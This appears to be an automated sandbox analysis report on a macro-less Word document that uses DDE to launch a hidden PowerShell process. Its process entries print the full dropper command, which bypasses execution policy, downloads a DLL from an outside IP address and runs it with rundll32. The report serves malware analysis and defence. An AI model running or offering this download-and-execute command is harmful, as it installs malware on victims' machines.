Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL

URL Overview

Remarks

The sample contacted only unknown URLs.

URL (1)

URL	Connection Successful	Reputation Status
213.183.51.187/debug.dll		Unknown

Involved Hosts

Hostname	IP Addresses	Country	City	Protocols	Has Blacklisted URL
	213.183.51.187	NL	Amsterdam	HTTP, TCP

Monitored Processes

Behavior Information - Sequential View

Process #1: winword.exe

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office15\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:09, Reason: Analysis Target
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:02:06
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x98c
Parent PID	0x618 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9C4 0x 9C0 0x 9BC 0x 9B8 0x 9B4 0x 9B0 0x 9A4 0x 9A0 0x 99C 0x 998 0x 994 0x 990 0x A0C 0x A94 0x D24

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000f0000	0x000f0000	0x001b7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002d0000	0x002d0000	0x003d0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000400000	0x00400000	0x00401fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000410000	0x00410000	0x00419fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000420000	0x00420000	0x0042ffff	Private Memory		Region Actions
private_0x0000000000430000	0x00430000	0x0052ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000530000	0x00530000	0x00560fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000570000	0x00570000	0x0057ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x0065efff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000660000	0x00660000	0x00666fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000670000	0x00670000	0x00671fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000680000	0x00680000	0x00680fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000690000	0x00690000	0x00691fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000006a0000	0x006a0000	0x006a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006b0000	0x006b0000	0x006bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006c0000	0x006c0000	0x006c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006d0000	0x006d0000	0x006d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006e0000	0x006e0000	0x006e0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x006f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000700000	0x00700000	0x007fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000800000	0x00800000	0x00800fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000810000	0x00810000	0x00810fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000820000	0x00820000	0x00820fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000830000	0x00830000	0x00830fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000840000	0x00840000	0x00840fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000850000	0x00850000	0x00850fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000860000	0x00860000	0x00860fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000870000	0x00870000	0x00870fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000880000	0x00880000	0x00880fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000890000	0x00890000	0x00890fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000008a0000	0x008a0000	0x008affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000008b0000	0x008b0000	0x009affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000009b0000	0x009b0000	0x009cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000009d0000	0x009d0000	0x009d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000009e0000	0x009e0000	0x009effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000009f0000	0x009f0000	0x009f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000a00000	0x00a00000	0x00a0ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000a10000	0x00a10000	0x00a13fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000a20000	0x00a20000	0x00a20fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000a30000	0x00a30000	0x00a30fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000a40000	0x00a40000	0x00a7ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000a80000	0x00a80000	0x00a81fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000a90000	0x00a90000	0x00acffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000ad0000	0x00ad0000	0x00ad0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000ae0000	0x00ae0000	0x00ae0fff	Pagefile Backed Memory	Readable	Region Actions
msxml6r.dll	0x00af0000	0x00af0fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00b00000	0x00b25fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000b30000	0x00b30000	0x00b30fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000b40000	0x00b40000	0x00b7ffff	Private Memory	Readable, Writable, Executable	Region Actions
c_1255.nls	0x00b80000	0x00b90fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000ba0000	0x00ba0000	0x00c9ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000ca0000	0x00ca0000	0x01092fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000010a0000	0x010a0000	0x010a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000010b0000	0x010b0000	0x010b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000010c0000	0x010c0000	0x010c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000010d0000	0x010d0000	0x010eefff	Private Memory	Readable, Writable	Region Actions
private_0x00000000010f0000	0x010f0000	0x010f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001100000	0x01100000	0x01100fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001110000	0x01110000	0x0111ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001120000	0x01120000	0x0119ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000011a0000	0x011a0000	0x011a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000011b0000	0x011b0000	0x011b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000011c0000	0x011c0000	0x012bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000012c0000	0x012c0000	0x012c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000012d0000	0x012d0000	0x012d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000012e0000	0x012e0000	0x012e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000012f0000	0x012f0000	0x012f0fff	Private Memory	Readable, Writable	Region Actions
winword.exe	0x01300000	0x014d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000014e0000	0x014e0000	0x020dffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x020e0000	0x023aefff	Memory Mapped File	Readable	Region Actions
private_0x00000000023b0000	0x023b0000	0x023b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023c0000	0x023c0000	0x023c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023d0000	0x023d0000	0x023d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023e0000	0x023e0000	0x023e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023f0000	0x023f0000	0x023f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002400000	0x02400000	0x02400fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002410000	0x02410000	0x02410fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002420000	0x02420000	0x02420fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002430000	0x02430000	0x02430fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002440000	0x02440000	0x02440fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002450000	0x02450000	0x02450fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002460000	0x02460000	0x02461fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000024f0000	0x024f0000	0x025effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002640000	0x02640000	0x0273ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002760000	0x02760000	0x0279ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000027a0000	0x027a0000	0x02b9ffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02ba0000	0x034cffff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000034d0000	0x034d0000	0x03ccffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000003d10000	0x03d10000	0x03d4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003db0000	0x03db0000	0x03dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003dd0000	0x03dd0000	0x03ecffff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x03ed0000	0x03f4efff	Memory Mapped File	Readable	Region Actions
private_0x0000000003f80000	0x03f80000	0x0407ffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x04080000	0x0413ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000004140000	0x04140000	0x0423ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004240000	0x04240000	0x0433ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004340000	0x04340000	0x0443ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004440000	0x04440000	0x0453ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004560000	0x04560000	0x0465ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000004660000	0x04660000	0x04a5ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
seguisb.ttf	0x04a60000	0x04ac3fff	Memory Mapped File	Readable	Region Actions
private_0x0000000004b10000	0x04b10000	0x04b4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004d30000	0x04d30000	0x04d6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004d70000	0x04d70000	0x0516ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005170000	0x05170000	0x0536ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005370000	0x05370000	0x0576ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000005770000	0x05770000	0x05f6ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000005f70000	0x05f70000	0x06370fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006380000	0x06380000	0x06780fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006790000	0x06790000	0x06b90fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006ba0000	0x06ba0000	0x06d9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006da0000	0x06da0000	0x0725ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007260000	0x07260000	0x0765ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007660000	0x07660000	0x07e5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000036890000	0x36890000	0x3689ffff	Private Memory	Readable, Writable, Executable	Region Actions
osppc.dll	0x63a70000	0x63a9cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
riched20.dll	0x63aa0000	0x63c2dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
adal.dll	0x63c30000	0x63ce4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x63cf0000	0x63d69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x63e40000	0x63f49fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x63f50000	0x6407bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x64080000	0x68d6afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x68d70000	0x6a653fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x6a660000	0x6bb1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x6bb30000	0x6bb79fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x6bb80000	0x6bc02fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x6bc10000	0x6bd25fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x6bd30000	0x6c0a0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x6c0b0000	0x6c16ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d2d1.dll	0x6c170000	0x6c229fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x6c230000	0x6cfd7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x6f5b0000	0x6f600fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x6fa80000	0x6fbd7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
office.odf	0x70ac0000	0x70fbffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x70fc0000	0x711fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x71230000	0x71298fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x712a0000	0x7135efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dxgi.dll	0x716f0000	0x71772fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 172 entries are omitted. The remaining entries can be found in flog.txt.

Process #2: cmd.exe

(Host: 58, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:20, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:55

OS Process Information

Information	Value
PID	0xa38
Parent PID	0x98c (c:\program files\microsoft office\office15\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A3C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000190000	0x00190000	0x0019ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001a0000	0x001a0000	0x001a6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000002d0000	0x002d0000	0x003d0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000410000	0x00410000	0x0050ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000510000	0x00510000	0x0110ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001110000	0x01110000	0x01272fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01280000	0x0154efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xa3c

(Host: 50, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:08 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 54241	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 16, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = c:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp	2	Fn
File	Get Info	filename = powershell.exe, type = file_attributes	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xa50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data

Process #3: powershell.exe

(Host: 871, Network: 75)

Information	Value
ID	#3
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK
Initial Working Directory	C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor	Start Time: 00:00:20, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:55

OS Process Information

Information	Value
PID	0xa50
Parent PID	0xa38 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A54 0x A60 0x A6C 0x A78 0x A8C 0x A90 0x AA8 0x AAC 0x AB0 0x AB4 0x AEC 0x D18

Region

Name	Start VA	End VA	Type	Permissions	Actions
